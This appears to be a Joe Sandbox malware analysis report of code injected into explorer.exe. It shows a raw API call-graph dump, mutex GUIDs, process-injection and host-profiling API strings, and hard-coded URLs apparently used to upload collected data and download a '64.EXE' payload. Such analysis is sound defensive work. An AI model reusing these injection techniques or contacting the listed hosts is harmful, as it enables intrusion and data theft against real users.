18609 e1e578 18607->18609 18608->18606 18609->18608 18611 e293ec _wincmdln 62 API calls 18610->18611 18612 e2cb67 18611->18612 18613 e2a940 _errno 62 API calls 18612->18613 18614 e2cb6c 18613->18614 18615 e2cba4 18614->18615 18616 e2cb78 18614->18616 18618 e3033c _fileno 62 API calls 18615->18618 18640 e2cbc1 _snprintf _cftoe_l 18615->18640 18617 e2a940 _errno 62 API calls 18616->18617 18620 e2cb7d 18617->18620 18618->18640 18619 e2cc2f 18622 e2a940 _errno 62 API calls 18619->18622 18621 e2a8d8 _invalid_parameter_noinfo 17 API calls 18620->18621 18623 e2cb88 18621->18623 18624 e2cc34 18622->18624 18626 e2c4b0 _fltout2 8 API calls 18623->18626 18625 e2a8d8 _invalid_parameter_noinfo 17 API calls 18624->18625 18625->18623 18627 e29386 18626->18627 18627->18603 18627->18604 18628 e308c0 _snprintf 62 API calls 18628->18640 18629 e2c9c8 82 API calls write_char 18629->18640 18630 e2a940 _errno 62 API calls 18631 e2d594 18630->18631 18633 e2a8d8 _invalid_parameter_noinfo 17 API calls 18631->18633 18632 e2d541 18632->18630 18633->18623 18634 e2d0f8 DecodePointer 18634->18640 18635 e2c4d0 free 62 API calls 18635->18640 18636 e3059c __setargv 62 API calls 18636->18640 18637 e310f0 64 API calls _snprintf 18637->18640 18638 e2d152 DecodePointer 18638->18640 18639 e2d172 DecodePointer 18639->18640 18640->18619 18640->18623 18640->18628 18640->18629 18640->18632 18640->18634 18640->18635 18640->18636 18640->18637 18640->18638 18640->18639 18641 e2ca64 82 API calls _snprintf 18640->18641 18642 e2ca10 82 API calls write_multi_char 18640->18642 18641->18640 18642->18640 18654 e291b0 18643->18654 18646 e1c271 CreateWindowExW 18649 e1c2e2 GetMessageW 18646->18649 18650 e1c32c 18646->18650 18647 e1c260 GetLastError 18647->18646 18648 e1c347 18647->18648 18651 e1c301 TranslateMessage DispatchMessageW 18649->18651 18652 e1c31f DestroyWindow 18649->18652 18650->18648 18653 e1c333 UnregisterClassW 18650->18653 18651->18649 18652->18650 18653->18648 18655 e1c21d RegisterClassW 18654->18655 
18655->18646 18655->18647 18657 e25d51 18656->18657 18658 e2635e 18656->18658 18659 e25d63 OpenMutexW 18657->18659 18660 e25d7c 18657->18660 18659->18660 18661 e26340 18660->18661 18662 e25da3 18660->18662 18663 e25da7 OpenMutexW 18660->18663 18666 e26353 CloseHandle 18661->18666 18667 e26348 CloseHandle 18661->18667 18664 e25df2 CreateEventW 18662->18664 18668 e26322 18662->18668 18663->18661 18665 e25dcc WaitForSingleObject 18663->18665 18664->18668 18677 e25e1a 18664->18677 18665->18662 18665->18664 18666->18658 18667->18666 18668->18661 18669 e2632a ReleaseMutex CloseHandle 18668->18669 18669->18661 18670 e25e96 WaitForSingleObject 18671 e2629e WaitForSingleObject 18670->18671 18698 e25e89 18670->18698 18673 e262b2 SetEvent WaitForSingleObject 18671->18673 18674 e262cd 18671->18674 18672 e25e5f WaitForSingleObject 18672->18677 18678 e25e7d 18672->18678 18673->18674 18679 e262d5 CloseHandle 18674->18679 18680 e262e9 18674->18680 18675 e25ef0 SleepEx WaitForSingleObject 18683 e25f25 WaitForSingleObject 18675->18683 18675->18698 18676 e25eba WaitForSingleObject 18676->18675 18681 e25ed0 WaitForSingleObject 18676->18681 18677->18672 18677->18698 18682 e2630a CloseHandle 18678->18682 18679->18680 18684 e262f1 CloseHandle 18680->18684 18685 e26305 18680->18685 18686 e25ee9 18681->18686 18681->18698 18682->18668 18683->18698 18684->18685 18685->18682 18687 e26dd0 4 API calls 18685->18687 18686->18671 18687->18682 18688 e26287 WaitForSingleObject 18688->18698 18690 e25f84 setsockopt 18691 e25fb7 CreateEventW 18690->18691 18690->18698 18692 e25fdb LocalAlloc 18691->18692 18691->18698 18695 e26002 CreateThread 18692->18695 18696 e261f5 CloseHandle 18692->18696 18693 e26211 shutdown closesocket 18694 e2622c CloseHandle 18693->18694 18700 e26255 18694->18700 18695->18698 18699 e2604d GetTickCount 18695->18699 18985 e26370 18695->18985 18696->18698 18697 e2627b ExitProcess 18698->18670 18698->18671 18698->18675 18698->18676 18698->18686 18698->18688 18698->18690 
18698->18693 18698->18694 18698->18696 18698->18697 18701 e261e7 LocalFree 18698->18701 18719 e26f30 18698->18719 18711 e26064 18699->18711 18700->18698 18701->18696 18702 e26173 shutdown closesocket SetEvent WaitForSingleObject 18737 e26dd0 18702->18737 18704 e26096 WaitForSingleObject 18707 e260b1 WaitForSingleObject 18704->18707 18704->18711 18705 e2607b WaitForSingleObject 18705->18704 18705->18711 18707->18711 18710 e261c8 CloseHandle 18710->18698 18711->18702 18711->18704 18711->18705 18712 e26104 WSAGetLastError 18711->18712 18714 e26163 SleepEx 18711->18714 18715 e26135 GetTickCount 18711->18715 18736 e23370 recv 18711->18736 18712->18711 18713 e26111 GetTickCount 18712->18713 18716 e26125 18713->18716 18714->18711 18717 e26142 18715->18717 18716->18702 18716->18711 18717->18714 18747 e23370 recv 18717->18747 18720 e26fd0 18719->18720 18721 e26f44 18719->18721 18722 e26fdd WaitForMultipleObjects WaitForSingleObject 18720->18722 18728 e27128 18720->18728 18760 e251b0 lstrlenW 18721->18760 18724 e27028 ReleaseMutex 18722->18724 18726 e2703c 18722->18726 18724->18728 18725 e26f99 18725->18720 18727 e26fa6 lstrcpyA 18725->18727 18726->18728 18729 e27064 lstrcpyA ReleaseMutex 18726->18729 18730 e27119 ReleaseMutex 18726->18730 18727->18728 18728->18698 18731 e251b0 213 API calls 18729->18731 18732 e27117 SetEvent 18730->18732 18733 e270e4 18731->18733 18732->18728 18733->18732 18735 e270f1 lstrcpyA 18733->18735 18735->18728 18736->18711 18738 e26de8 18737->18738 18739 e26e47 18738->18739 18740 e26e2c SetEvent 18738->18740 18745 e261c3 18738->18745 18741 e26e7f 18739->18741 18742 e26e5f WaitForSingleObject 18739->18742 18740->18739 18743 e26eb2 18741->18743 18744 e26e97 CloseHandle 18741->18744 18742->18741 18743->18745 18746 e26eca CloseHandle 18743->18746 18744->18743 18748 e13ae0 18745->18748 18746->18745 18747->18717 18750 e13aee 18748->18750 18749 e13dcd 18749->18710 18750->18749 18751 e13b3e 18750->18751 18758 e13cd4 18750->18758 18752 e13b95 18751->18752 
18753 e13b68 SetEvent 18751->18753 18754 e13bc3 WaitForSingleObject CloseHandle 18752->18754 18755 e13c4d 18752->18755 18753->18752 18754->18755 18756 e13c77 CloseHandle 18755->18756 18757 e13ccf 18755->18757 18756->18757 18757->18710 18758->18749 18759 e13d8b VirtualFree 18758->18759 18759->18749 18800 e257b0 18760->18800 18762 e25719 und_memcpy 18762->18725 18766 e252af setsockopt 18767 e252fa 18766->18767 18768 e25778 shutdown closesocket 18766->18768 18866 e24c90 18767->18866 18768->18762 18773 e24c90 10 API calls 18774 e253e5 18773->18774 18774->18768 18775 e24740 10 API calls 18774->18775 18776 e25430 18775->18776 18776->18768 18777 e24c90 10 API calls 18776->18777 18778 e25494 18777->18778 18778->18768 18902 e25bb0 LocalAlloc 18778->18902 18781 e24c90 10 API calls 18782 e254fb 18781->18782 18783 e2576a LocalFree 18782->18783 18784 e24740 10 API calls 18782->18784 18783->18768 18785 e25548 18784->18785 18785->18783 18786 e24c90 10 API calls 18785->18786 18787 e255ac 18786->18787 18787->18783 18914 e259a0 LocalAlloc 18787->18914 18790 e24c90 10 API calls 18791 e25613 18790->18791 18792 e2575c LocalFree 18791->18792 18793 e24740 10 API calls 18791->18793 18792->18783 18794 e25660 18793->18794 18794->18792 18795 e24740 10 API calls 18794->18795 18796 e256b9 18795->18796 18796->18792 18797 e256d3 CreateEventW 18796->18797 18797->18792 18798 e256f9 WSAEventSelect 18797->18798 18798->18762 18799 e2574e CloseHandle 18798->18799 18799->18792 18929 e21f90 18800->18929 18803 e2520e 18803->18762 18810 e23b40 socket 18803->18810 18804 e257e8 CoCreateGuid 18805 e258d4 CoUninitialize 18804->18805 18806 e257fb StringFromGUID2 18804->18806 18805->18803 18806->18805 18807 e25819 wsprintfA LocalAlloc 18806->18807 18807->18805 18808 e25856 und_memcpy 18807->18808 18809 e258b9 LocalFree CoUninitialize 18808->18809 18809->18803 18811 e23b84 WSAGetLastError WSACreateEvent 18810->18811 18812 e23b7d 18810->18812 18813 e23ba7 WSAEventSelect 18811->18813 18814 e23b9d 18811->18814 
18812->18762 18812->18766 18816 e23bcb 18813->18816 18864 e23bc1 18813->18864 18815 e2417c shutdown closesocket 18814->18815 18815->18812 18818 e23bdb 18816->18818 18819 e23dee 18816->18819 18817 e24171 CloseHandle 18817->18815 18822 e23be7 18818->18822 18823 e23bf4 inet_addr 18818->18823 18820 e23e15 inet_addr 18819->18820 18821 e23e05 18819->18821 18824 e23e79 htons connect 18820->18824 18825 e23e34 gethostbyname 18820->18825 18821->18824 18826 e23c46 htons connect 18822->18826 18823->18826 18827 e23c0d gethostbyname 18823->18827 18824->18817 18829 e23ecc WSAGetLastError 18824->18829 18825->18821 18825->18864 18828 e23c8a WSAGetLastError 18826->18828 18826->18864 18830 e23c28 18827->18830 18827->18864 18831 e23c9b WSAWaitForMultipleEvents 18828->18831 18828->18864 18829->18817 18832 e23edd WSAWaitForMultipleEvents 18829->18832 18830->18826 18835 e23d19 18831->18835 18836 e23cfc WSACloseEvent closesocket 18831->18836 18837 e23f70 WSACloseEvent closesocket 18832->18837 18838 e23f59 18832->18838 18839 e23d23 WSACloseEvent closesocket 18835->18839 18840 e23d40 18835->18840 18836->18812 18837->18812 18838->18837 18841 e23f8d 18838->18841 18839->18812 18842 e23d47 WSAEnumNetworkEvents 18840->18842 18843 e23dc5 18840->18843 18841->18817 18845 e23f9b WSAEnumNetworkEvents 18841->18845 18846 e23d60 closesocket WSACloseEvent 18842->18846 18847 e23d7d 18842->18847 18844 e23dcc closesocket WSACloseEvent 18843->18844 18843->18864 18844->18812 18848 e23fb7 WSACloseEvent closesocket 18845->18848 18849 e23fd4 18845->18849 18846->18812 18850 e23da5 18847->18850 18851 e23d88 closesocket WSACloseEvent 18847->18851 18848->18812 18852 e23ffb 18849->18852 18853 e23fde WSACloseEvent closesocket 18849->18853 18850->18843 18854 e23db0 WSACloseEvent 18850->18854 18851->18812 18855 e24022 inet_addr 18852->18855 18856 e24007 18852->18856 18853->18812 18854->18812 18855->18856 18857 e24067 18856->18857 18858 e240ea 18856->18858 18931 e241b0 LocalAlloc 18857->18931 18858->18817 18945 e24340 
LocalAlloc 18858->18945 18863 e240d0 CloseHandle 18863->18812 18864->18817 18865 e2415f CloseHandle 18865->18812 18865->18817 18867 e24cb4 18866->18867 18868 e24cd9 18866->18868 18977 e233b0 send 18867->18977 18870 e24d20 WSACreateEvent 18868->18870 18871 e24cd4 18868->18871 18870->18871 18879 e24d46 18870->18879 18871->18768 18884 e24740 18871->18884 18872 e2517e CloseHandle 18872->18871 18873 e24df7 WaitForSingleObject 18873->18879 18875 e24eb6 WaitForSingleObject 18875->18879 18876 e24fa9 WSAGetLastError 18877 e24fba WSAEventSelect 18876->18877 18883 e24e58 18876->18883 18878 e24ff0 WSAWaitForMultipleEvents 18877->18878 18877->18883 18878->18879 18878->18883 18879->18873 18879->18875 18879->18876 18880 e250f3 WSAEnumNetworkEvents 18879->18880 18881 e25070 18879->18881 18879->18883 18978 e233b0 send 18879->18978 18880->18879 18880->18883 18882 e2509d WaitForSingleObject 18881->18882 18881->18883 18882->18881 18883->18871 18883->18872 18885 e24764 18884->18885 18886 e24789 18884->18886 18980 e23370 recv 18885->18980 18888 e247d0 WSACreateEvent 18886->18888 18889 e24784 18886->18889 18888->18889 18898 e247f6 18888->18898 18889->18768 18889->18773 18890 e24917 18890->18889 18891 e24c51 CloseHandle 18890->18891 18891->18889 18892 e248b6 WaitForSingleObject 18892->18898 18894 e24975 WaitForSingleObject 18894->18898 18895 e24a7c WSAGetLastError 18895->18890 18896 e24a8d WSAEventSelect 18895->18896 18896->18890 18897 e24ac3 WSAWaitForMultipleEvents 18896->18897 18897->18890 18897->18898 18898->18890 18898->18892 18898->18894 18898->18895 18899 e24bc6 WSAEnumNetworkEvents 18898->18899 18901 e24b43 18898->18901 18979 e23370 recv 18898->18979 18899->18890 18899->18898 18900 e24b70 WaitForSingleObject 18900->18901 18901->18890 18901->18900 18903 e25bd8 lstrcpyW 18902->18903 18913 e254a5 18902->18913 18904 e1ddc0 3 API calls 18903->18904 18905 e25c10 GetModuleFileNameW 18904->18905 18906 e25c41 18905->18906 18907 e25c2f LocalFree 18905->18907 18908 e25c77 lstrlenW 
18906->18908 18909 e25c65 LocalFree 18906->18909 18907->18913 18910 e25cbc GetCurrentProcessId wnsprintfW 18908->18910 18911 e25cad LocalFree 18908->18911 18909->18913 18981 e08eb0 18910->18981 18911->18913 18913->18768 18913->18781 18915 e255bd 18914->18915 18916 e259c8 LoadLibraryW 18914->18916 18915->18783 18915->18790 18917 e259e2 LocalFree 18916->18917 18918 e259f4 GetProcAddress 18916->18918 18917->18915 18919 e25a13 LocalFree 18918->18919 18920 e25a25 _snprintf 18918->18920 18919->18915 18921 e25a37 RtlGetVersion 18920->18921 18922 e25a60 GetUserGeoID gethostname 18921->18922 18923 e25a4e LocalFree 18921->18923 18924 e25b86 LocalFree 18922->18924 18925 e25ad7 gethostbyname 18922->18925 18923->18915 18924->18915 18925->18924 18926 e25afc GetComputerNameExW 18925->18926 18926->18924 18927 e25b43 GetUserNameW 18926->18927 18927->18924 18928 e25b6d GetTickCount64 18927->18928 18928->18915 18930 e21fa6 CoInitializeEx 18929->18930 18930->18803 18930->18804 18932 e240c8 18931->18932 18933 e24227 htons 18931->18933 18932->18863 18932->18864 18959 e24620 WSACreateEvent 18933->18959 18936 e24327 LocalFree 18936->18932 18938 e24295 18938->18936 18967 e24500 WSACreateEvent 18938->18967 18942 e242da 18942->18936 18943 e242fc und_memcpy 18942->18943 18944 e24318 LocalFree 18943->18944 18944->18932 18946 e24157 18945->18946 18947 e243b9 htons wsprintfA 18945->18947 18946->18817 18946->18865 18948 e24620 5 API calls 18947->18948 18949 e2442a 18948->18949 18950 e244dd LocalFree 18949->18950 18975 e233b0 send 18949->18975 18950->18946 18952 e2444d 18952->18950 18953 e24500 5 API calls 18952->18953 18954 e24470 18953->18954 18954->18950 18976 e23370 recv 18954->18976 18956 e24490 18956->18950 18957 e244b2 und_memcpy 18956->18957 18958 e244ce LocalFree 18957->18958 18958->18946 18960 e2464f WSAEventSelect 18959->18960 18964 e24271 18959->18964 18961 e24724 WSACloseEvent 18960->18961 18962 e2466d WSAWaitForMultipleEvents WSACloseEvent 18960->18962 18961->18964 18962->18964 18965 
e246df 18962->18965 18964->18936 18966 e233b0 send 18964->18966 18965->18961 18965->18964 18966->18938 18968 e2452f WSAEventSelect 18967->18968 18972 e242ba 18967->18972 18969 e24604 WSACloseEvent 18968->18969 18970 e2454d WSAWaitForMultipleEvents WSACloseEvent 18968->18970 18969->18972 18970->18972 18973 e245bf 18970->18973 18972->18936 18974 e23370 recv 18972->18974 18973->18969 18973->18972 18974->18942 18975->18952 18976->18956 18977->18871 18978->18879 18979->18898 18980->18889 18982 e28378 89 API calls 18981->18982 18983 e08ed9 RegGetValueW 18982->18983 18984 e08f24 18983->18984 18984->18913 18994 e263d1 18985->18994 18986 e26b7f WaitForSingleObject 18986->18994 18987 e2641c WaitForSingleObject 18987->18986 18987->18994 18988 e267e2 WaitForMultipleObjects 18991 e26482 18988->18991 18988->18994 18989 e2646b WaitForSingleObject 18989->18991 18989->18994 18990 e26d70 18996 e26d7b shutdown closesocket 18990->18996 18997 e26da8 LocalFree 18990->18997 18991->18990 18995 e26ce9 shutdown closesocket 18991->18995 18999 e26d41 CloseHandle 18991->18999 18992 e26c79 shutdown closesocket 18992->18994 18993 e26be7 shutdown closesocket 18993->18994 18994->18986 18994->18987 18994->18988 18994->18989 18994->18991 18994->18992 18994->18993 18998 e26c3f CloseHandle 18994->18998 19000 e264ac WaitForSingleObject 18994->19000 19001 e23b40 62 API calls 18994->19001 19002 e2687a WaitForSingleObject 18994->19002 19004 e26537 setsockopt 18994->19004 19007 e267ac shutdown closesocket 18994->19007 19009 e24c90 10 API calls 18994->19009 19010 e268ff shutdown closesocket CloseHandle 18994->19010 19011 e26985 recv 18994->19011 19017 e24740 10 API calls 18994->19017 19018 e2671c WSACreateEvent 18994->19018 18995->18991 18996->18997 18998->18994 18999->18991 19000->18994 19001->18994 19002->18991 19003 e26898 WaitForSingleObject 19002->19003 19003->18994 19005 e268bb WSAEnumNetworkEvents 19003->19005 19006 e26582 setsockopt 19004->19006 19004->19007 19005->18994 19008 e26b06 shutdown 
closesocket CloseHandle 19005->19008 19006->18994 19006->19007 19007->18994 19008->18994 19009->18994 19010->18994 19012 e26a95 shutdown closesocket CloseHandle 19011->19012 19016 e269c3 19011->19016 19012->18994 19014 e26a24 shutdown closesocket CloseHandle 19014->19016 19015 e269e4 CloseHandle 19015->19016 19016->18994 19016->19014 19016->19015 19022 e22660 19016->19022 19017->18994 19018->19007 19019 e26735 WSAEventSelect 19018->19019 19020 e26755 19019->19020 19021 e2678a CloseHandle 19019->19021 19020->19021 19021->19007 19023 e22b27 19022->19023 19025 e226aa 19022->19025 19024 e22b4a setsockopt 19023->19024 19043 e22b9e 19023->19043 19026 e22b88 19024->19026 19024->19043 19027 e2270a 19025->19027 19028 e228ed WaitForSingleObject 19025->19028 19075 e2287d 19025->19075 19031 e16790 110 API calls 19026->19031 19029 e22722 CloseHandle 19027->19029 19030 e22756 19027->19030 19032 e22915 19028->19032 19029->19030 19035 e227a2 CreateEventW 19030->19035 19036 e2276e CloseHandle 19030->19036 19038 e22b91 19031->19038 19033 e2293b CloseHandle 19032->19033 19034 e2296f 19032->19034 19032->19075 19033->19034 19039 e22987 CloseHandle 19034->19039 19040 e229bb CreateEventW 19034->19040 19041 e227c6 CreateThread 19035->19041 19035->19075 19036->19035 19037 e22c1e setsockopt 19042 e22c5c 19037->19042 19037->19075 19038->19043 19086 e16d00 19038->19086 19039->19040 19044 e229df CreateThread 19040->19044 19040->19075 19045 e22892 CloseHandle 19041->19045 19046 e2281c ResumeThread 19041->19046 19121 e233b0 send 19042->19121 19043->19037 19053 e22c9e 19043->19053 19043->19075 19049 e22a35 ResumeThread 19044->19049 19050 e22aab CloseHandle 19044->19050 19045->19075 19051 e22887 CloseHandle 19046->19051 19046->19075 19055 e22aa0 CloseHandle 19049->19055 19049->19075 19050->19075 19051->19045 19052 e22c7f closesocket 19052->19075 19056 e22d17 19053->19056 19061 e22d4b 19053->19061 19053->19075 19055->19050 19122 e23160 19056->19122 19057 e22bbc 19120 e233b0 send 19057->19120 19060 

Control-flow Graph: entry block e10740-e1079c
APIs
Strings
Memory Dump Source
• Source File: 00000010.00000002.2933884391.0000000000E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 00E00000, based on PE: true
• Associated: 00000010.00000002.2933855119.0000000000E00000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000010.00000002.2933920370.0000000000E38000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000010.00000002.2933939123.0000000000E44000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000010.00000002.2933939123.0000000000E5C000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000010.00000002.2933939123.0000000000E5E000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000010.00000002.2933939123.0000000000E61000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000010.00000002.2933939123.0000000000E68000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000010.00000002.2934079006.0000000000E6C000.00000002.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_16_2_e00000_explorer.jbxd
Yara matches
Similarity
• API ID: Section$View$Close$lstrcpy$Unmap$AddressHandleProcProcess$Create$Current$Terminate$EventLibraryLoadModuleObjectSingleThreadUserWait
• String ID: @$@$CloseHandle$GetProcAddress$KERNEL32.DLL$KERNEL32.DLL$LoadLibraryA$LoadLibraryW$LocalAlloc$LocalFree$MessageBoxW$NTDLL.DLL$NtClose$NtCreateSection$NtMapViewOfSection$NtUnmapViewOfSection$RtlCreateUserThread$Sleep$USER32.DLL$VirtualAlloc$VirtualFree$VirtualProtect$h
• API String ID: 1065732154-2887914861
• Opcode ID: b3db4daf76245d26ee7c37ddfd04114db5d7fc73b353293878a34707a5285217
• Instruction ID: a47f91716bcdcf9dbd900e824a68c79eb69dcabf3577580a8268aa944c9d6a44
• Opcode Fuzzy Hash: b3db4daf76245d26ee7c37ddfd04114db5d7fc73b353293878a34707a5285217
• Instruction Fuzzy Hash: 3C528D76218BC086EB71DF15F8983DAB7A0F788794F501616DA8993B68DF7DC188CB40

Control-flow Graph: entry block e25d20-e25d4b
APIs
Strings
• {7E105FD4-6112-4FB9-A722-91E984087449}, xrefs: 00E25D63
• {DD700AA6-D197-4A4A-838A-B93EA96F236B}, xrefs: 00E25D2C
• {8E8A4502-77C1-498F-9A62-1CFFC74945A4}, xrefs: 00E26249
• {EFC3ABD3-EC58-4FCB-B5F7-D01538741E91}, xrefs: 00E25DA7
Memory Dump Source
• Source File: 00000010.00000002.2933884391.0000000000E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 00E00000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_16_2_e00000_explorer.jbxd
Yara matches
Similarity
• API ID: CloseHandle$EventMutexOpen$CreateObjectReleaseSingleWait
• String ID: {7E105FD4-6112-4FB9-A722-91E984087449}${8E8A4502-77C1-498F-9A62-1CFFC74945A4}${DD700AA6-D197-4A4A-838A-B93EA96F236B}${EFC3ABD3-EC58-4FCB-B5F7-D01538741E91}
• API String ID: 385723476-3844246474
• Opcode ID: 3cfad946db56583bd56c67fe3a3e6adbf597aeab51e253aa603a430df7c46a88
• Instruction ID: 58a60ad632336a13296f5c1c898e7bef204f918767355d97d612729f59886462
• Opcode Fuzzy Hash: 3cfad946db56583bd56c67fe3a3e6adbf597aeab51e253aa603a430df7c46a88
• Instruction Fuzzy Hash: 52F18631504AD0C6F724DF61F94835A73B1F7D4799F206A26D68AA2AB8CF7DC488CB01

Control-flow Graph: entry block e053b0-e053dc
APIs
Strings
• {7E105FD4-6112-4FB9-A722-91E984087449}, xrefs: 00E05409
• {DF4EE2DA-C20C-4BBF-97D5-4B94E23FE1C8}, xrefs: 00E05863
• {DD790A50-FBBA-44EC-A8E0-C3475C4234CA}, xrefs: 00E0549A
• %s %s, xrefs: 00E05877
• {B35D8F70-AFF8-4D2B-BFC7-10AF8714710B}, xrefs: 00E053E8
• https://woo097878781.win/upload.php, xrefs: 00E0547D
• Mozilla/5.0 (Windows NT 6.1; WOW64; rv:64.0) Gecko/20100101 Firefox/64.0, xrefs: 00E05443, 00E056FE
• https://woo097878781.win/64.EXE, xrefs: 00E05723
• {2CE5F8BD-0511-45BE-87AB-414E34221A74}, xrefs: 00E05426, 00E05890
• HWID_%s, xrefs: 00E0564F
Memory Dump Source
• Source File: 00000010.00000002.2933884391.0000000000E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 00E00000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_16_2_e00000_explorer.jbxd
Yara matches
Similarity
• API ID: lstrcpy$Local$BinaryCloseCryptFreeHandleString$Alloc
• String ID: %s %s$HWID_%s$Mozilla/5.0 (Windows NT 6.1; WOW64; rv:64.0) Gecko/20100101 Firefox/64.0$https://woo097878781.win/64.EXE$https://woo097878781.win/upload.php${2CE5F8BD-0511-45BE-87AB-414E34221A74}${7E105FD4-6112-4FB9-A722-91E984087449}${B35D8F70-AFF8-4D2B-BFC7-10AF8714710B}${DD790A50-FBBA-44EC-A8E0-C3475C4234CA}${DF4EE2DA-C20C-4BBF-97D5-4B94E23FE1C8}
• API String ID: 1616647813-822792202
• Opcode ID: 8237cef07f34f6c1e30c066254d37a39d5b06242a3309f111f42f1e23e4de9d6
• Instruction ID: 679589874cac64a5a0d2ee8df993dcabba28860d769f3351b8b4cbeba4391c28
• Opcode Fuzzy Hash: 8237cef07f34f6c1e30c066254d37a39d5b06242a3309f111f42f1e23e4de9d6
• Instruction Fuzzy Hash: AA027136204FC1C6E724CB14F99439A73A1F7A8788F406A26DA4DA37A4DF3EC594CB01

Control-flow Graph: entry block e04da0-e04e0d
• API calls in graph: GetTempPathW, SHGetKnownFolderPath, CoTaskMemFree, CreateDirectoryW, GetLastError, lstrcpyW, CreateFileW, WriteFile, CloseHandle, CreateProcessW, CoInitializeEx, ShellExecuteW, CoUninitialize
Memory Dump Source
• Source File: 00000010.00000002.2933884391.0000000000E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 00E00000, based on PE: true
• Associated: 00000010.00000002.2933855119.0000000000E00000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000010.00000002.2933920370.0000000000E38000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000010.00000002.2933939123.0000000000E44000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000010.00000002.2933939123.0000000000E5C000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000010.00000002.2933939123.0000000000E5E000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000010.00000002.2933939123.0000000000E61000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000010.00000002.2933939123.0000000000E68000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000010.00000002.2934079006.0000000000E6C000.00000002.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_16_2_e00000_explorer.jbxd
Similarity
• API ID: CreateErrorLastPath$DirectoryFileFolderFreeKnownTaskTemplstrcpy
• String ID: "%s"$"%s" "%s"$%s\%s$%s\%s$Open$h
• API String ID: 1929679530-3531242659
• Opcode ID: c057f54f722bcf2c844584758c207069bac51c29aa03ca2c9ff8dcd663dc8fb8
• Instruction ID: 8edc563ed916e33d53d3e2cb75474c5a6c7e39d61d4e19a40e48ad0816b772c9
• Opcode Fuzzy Hash: c057f54f722bcf2c844584758c207069bac51c29aa03ca2c9ff8dcd663dc8fb8
• Instruction Fuzzy Hash: 8FB14872218BC486EB30DB64F55839BB3A1F788794F805626D68D93BA8DF3DC558CB40

Control-flow Graph: entry block e19cb0-e19d5a
• API calls in graph: LocalAlloc, CreateEventW, LocalFree, CloseHandle, WaitForMultipleObjects
APIs
• std::rethrow_exception.LIBCMTD ref: 00E19D70
• std::rethrow_exception.LIBCMTD ref: 00E19DF4
Memory Dump Source
• Source File: 00000010.00000002.2933884391.0000000000E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 00E00000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_16_2_e00000_explorer.jbxd
Similarity
• API ID: std::rethrow_exception
• String ID: */*$GET$h
• API String ID: 1317400359-3109941101
• Opcode ID: 706f8eab67db1428491878b4aef581ec6e6f376884b732e353feec605afe0311
• Instruction ID: fe95a893dd72173f829b185808183df858a2ad4a94920c78aacf251201611ba9
• Opcode Fuzzy Hash: 706f8eab67db1428491878b4aef581ec6e6f376884b732e353feec605afe0311
• Instruction Fuzzy Hash: B502E072209AC486E774CB55F8943EEB3A0F3C9784F505126DB9993AA8DF7DC588CB00

Control-flow Graph: entry block e22210-e22228
• API calls in graph: lstrlenW, CreateEventW, CreateThread, LocalFree, WSAStartup, CloseHandle, WSACleanup
Memory Dump Source
• Source File: 00000010.00000002.2933884391.0000000000E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 00E00000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_16_2_e00000_explorer.jbxd
Similarity
• API ID: Create$Thread$EventFreeLocal$CleanupCloseHandleStartuplstrlen
• String ID: "%s%s"$UNLOAD.TXT$WindowsSystem$WindowsSystem$WindowsSystem.exe${34E50511-FBB8-42F8-98A2-2629192A03A0}
• API String ID: 168511978-1681456302
• Opcode ID: 16fe39ba53266679c6a7dea738d884dd69b85df6d687fb142a66e2484d54e1df
• Instruction ID: 076b21d92ef2e47622b55f83372b520577d4d01939be105bdab80a05b0203f0f
• Opcode Fuzzy Hash: 16fe39ba53266679c6a7dea738d884dd69b85df6d687fb142a66e2484d54e1df
• Instruction Fuzzy Hash: 34614D31104BD1D2F728DB20FE5879A33A4F3A838DF505A2AD55967AA4CF7EC589CB00

Control-flow Graph

APIs
  • Part of subcall function 00E187C0: LoadLibraryW.KERNEL32 ref: 00E187D2
• ExitProcess.KERNEL32 ref: 00E0104B
• GetModuleFileNameW.KERNEL32 ref: 00E01076
• ExitProcess.KERNEL32 ref: 00E01082
Strings
• {DD700AA6-D197-4A4A-838A-B93EA96F236B}, xrefs: 00E010FB
• {16875766-AD57-416F-8330-F0B6BCC3AFF1}, xrefs: 00E010AF
• {8D32440A-6991-45E9-84BE-12C6B52AF58D}, xrefs: 00E01134
Memory Dump Source
• Source File: 00000010.00000002.2933884391.0000000000E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 00E00000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_16_2_e00000_explorer.jbxd
Similarity
• API ID: ExitProcess$FileLibraryLoadModuleName
• String ID: {16875766-AD57-416F-8330-F0B6BCC3AFF1}${8D32440A-6991-45E9-84BE-12C6B52AF58D}${DD700AA6-D197-4A4A-838A-B93EA96F236B}
• API String ID: 2450766465-2697939069
• Opcode ID: 482fb3a350b31bacb31896883e192aa97b6bd53c2f9ebca60f0dcddbc31280cb
• Instruction ID: 9019bb6acfd2252b5cadacf5b5dac99bf20475356b182f26ee8889f098fbf172
• Opcode Fuzzy Hash: 482fb3a350b31bacb31896883e192aa97b6bd53c2f9ebca60f0dcddbc31280cb
